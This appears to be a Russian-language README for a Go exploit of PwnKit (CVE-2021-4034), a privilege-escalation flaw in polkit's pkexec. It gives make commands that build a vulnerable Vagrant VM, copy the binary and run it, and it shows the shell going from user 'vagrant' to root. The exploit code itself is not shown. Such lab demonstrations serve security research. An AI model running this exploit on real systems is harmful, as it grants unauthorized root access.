
Эксплойт для уязвимости PwnKit, CVE-2021-4034, написанный на Go
Это рабочий эксплойт для уязвимости pwnkit, CVE-2021-4034, написанный на Go
Попробуйте:
# создайте уязвимую vagrant-машину
$ make vm
...
# соберите бинарник и скопируйте его на vagrant-бокс
$ make scp
# подключитесь по ssh к vagrant-боксу
$ make ssh
# Пользователь по умолчанию — "vagrant"
vagrant@ubuntu-focal:~$ whoami
vagrant
# выполните эксплойт
vagrant@ubuntu-focal:/tmp$ cd /tmp && ./pwnkit-go
$ whoami
root